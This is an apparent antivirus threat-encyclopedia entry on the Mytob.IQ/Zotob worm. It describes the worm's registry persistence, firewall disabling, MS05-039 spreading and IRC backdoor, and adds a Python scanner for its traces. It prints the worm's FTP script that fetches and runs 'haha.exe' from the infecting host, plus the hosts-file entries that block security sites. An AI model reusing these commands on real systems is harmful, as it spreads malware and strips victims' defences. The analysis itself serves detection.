Threat Encyclopedia

Selected viruses, spyware, and other threats: sorted alphabetically

Win32/Mytob.IQ

Aliases: W32/Zotob.A, W32/Zotob.worm, Zotob.A, Zotob-A
Type: Worm
Affects: Windows 2000

Mytob.IQ is a 22528-byte worm, runtime-packed with UPack. Upon execution, the worm copies itself into the System32 folder as "botzor.exe".
The worm creates a mutex named "B-O-T-Z-O-R" so that only one instance of the worm runs on a machine at a time.

The worm adds the following registry values so that it runs every time Windows is started:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
"WINDOWS SYSTEM" = "botzor.exe"

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
"WINDOWS SYSTEM" = "botzor.exe"

Note: The worm continuously checks for these registry values and recreates them if they have been removed.

Mytob.IQ also modifies the following registry value:

HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess
"Start" = "4"

Changing this value lowers the security settings of the compromised system: a Start value of 4 marks the service as disabled.

Note: This disables the Shared Access (Internet Connection Sharing and firewall) service on Windows NT-based systems.

The worm generates random IP addresses and attempts to connect to TCP port 445 on each of them to exploit the Plug and Play buffer overflow vulnerability [see MS05-039 at http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx]. If exploitation succeeds, the shellcode executed on the target machine instructs it to connect back to the infecting system and retrieve a copy of the worm. (The copy is transferred to the target over the worm's own FTP server connection, driven by the 2pac.txt FTP command file.)

Note: The worm creates a task named "SCAN" for this purpose.

The 2pac.txt file contains the following FTP commands:

open %IP% %TCP port%
user hell rulez
binary
get haha.exe
quit

The worm runs FTP.EXE locally on the compromised system to retrieve a copy of itself, named "haha.exe", from the system that connected to it, and launches the file once the download completes.

Note: The worm's FTP server listens on port 33333.

The worm attempts to overwrite the hosts file with the following entries, redirecting these sites to the local host so that they cannot be reached:

127.0.0.1 www.symantec.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 symantec.com
127.0.0.1 www.sophos.com
127.0.0.1 sophos.com
127.0.0.1 www.mcafee.com
127.0.0.1 mcafee.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 www.viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 f-secure.com
127.0.0.1 www.f-secure.com
127.0.0.1 kaspersky.com
127.0.0.1 kaspersky-labs.com
127.0.0.1 www.avp.com
127.0.0.1 www.kaspersky.com
127.0.0.1 avp.com
127.0.0.1 www.networkassociates.com
127.0.0.1 networkassociates.com
127.0.0.1 www.ca.com
127.0.0.1 ca.com
127.0.0.1 mast.mcafee.com
127.0.0.1 my-etrust.com
127.0.0.1 www.my-etrust.com
127.0.0.1 download.mcafee.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 secure.nai.com
127.0.0.1 nai.com
127.0.0.1 www.nai.com
127.0.0.1 update.symantec.com
127.0.0.1 updates.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 customer.symantec.com
127.0.0.1 rads.mcafee.com
127.0.0.1 trendmicro.com
127.0.0.1 pandasoftware.com
127.0.0.1 www.pandasoftware.com
127.0.0.1 www.trendmicro.com
127.0.0.1 www.grisoft.com
127.0.0.1 www.microsoft.com
127.0.0.1 microsoft.com
127.0.0.1 www.virustotal.com
127.0.0.1 virustotal.com
127.0.0.1 www.amazon.com
127.0.0.1 www.amazon.co.uk
127.0.0.1 www.amazon.ca
127.0.0.1 www.amazon.fr
127.0.0.1 www.paypal.com
127.0.0.1 paypal.com
127.0.0.1 moneybookers.com
127.0.0.1 www.moneybookers.com
127.0.0.1 www.ebay.com
127.0.0.1 ebay.com
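As an added host-inspection example, not part of the original write-up: the Python below checks exported host data for the autostart values, the SharedAccess change and the hosts-file redirections described above. It parses a regedit .reg export and a hosts file as text rather than reading the live system, so it runs offline; the sample inputs are constructed.

```python
import re
# Indicators from the write-up above, in the long hive form used by .reg exports.
RUN_KEYS = (
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices",
)
SHARED_ACCESS = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess"
PERSIST_NAME, PERSIST_DATA = "WINDOWS SYSTEM", "botzor.exe"
# Subset of the sites the worm redirects to 127.0.0.1 in the hosts file.
BLOCKED_SITES = {"www.symantec.com", "liveupdate.symantec.com", "www.sophos.com",
                 "www.mcafee.com", "www.f-secure.com", "www.kaspersky.com",
                 "www.trendmicro.com", "www.microsoft.com", "www.paypal.com"}

def parse_reg_export(text):
    """Parse a regedit .reg export into {key: {value_name: data_as_str}}."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):  # [Key\Path] header
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = re.fullmatch(r'"([^"]+)"=(?:"([^"]*)"|dword:([0-9a-fA-F]{8}))', line)
        if m and current is not None:
            name, s, dword = m.groups()  # string data or hex DWORD
            keys[current][name] = s if s is not None else str(int(dword, 16))
    return keys

def scan(reg_text, hosts_text):
    """Return a list of Mytob.IQ indicators found in the two exports."""
    found, reg = [], parse_reg_export(reg_text)
    for key in RUN_KEYS:  # autostart value the worm writes and re-creates
        if reg.get(key, {}).get(PERSIST_NAME, "").lower() == PERSIST_DATA:
            found.append(f"autostart: {key}\\{PERSIST_NAME} = {PERSIST_DATA}")
    if reg.get(SHARED_ACCESS, {}).get("Start") == "4":  # 4 = SERVICE_DISABLED
        found.append("SharedAccess service disabled (Start=4)")
    for line in hosts_text.splitlines():
        fields = line.split("#", 1)[0].split()  # drop hosts-file comments
        if len(fields) >= 2 and fields[0] == "127.0.0.1":
            found += [f"hosts: {h} -> 127.0.0.1" for h in fields[1:]
                      if h.lower() in BLOCKED_SITES]
    return found

# Constructed sample exports from an infected host (not real captures).
REG_SAMPLE = r"""[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"WINDOWS SYSTEM"="botzor.exe"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
"Start"=dword:00000004
"""
HOSTS_SAMPLE = "127.0.0.1 localhost\n127.0.0.1 www.symantec.com  # constructed\n127.0.0.1 liveupdate.symantec.com\n"
```

A clean host yields an empty list; the constructed samples produce four findings (one autostart value, the disabled service, two redirected sites).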

The worm also provides IRC backdoor functionality with the following capabilities:

Downloading files
Downloading new worm updates
Executing files
Providing uptime information to the remote controller
Providing information about the worm variant to the remote controller
Notifying IRC Channels/Operator via private message
Restarting the computer
Providing FTP Server Access on the compromised system
Removing components

The worm contains the following text:

.... Made By .... Greetz to good friend ..... Based On ....
MSG to avs: the first av who detect this worm will be the first killed in the next 24hours!!!

It tries to connect to the IRC server diabl0.turkcoders.net.

History: Analysis and Write-up by: Michael St. Neitzel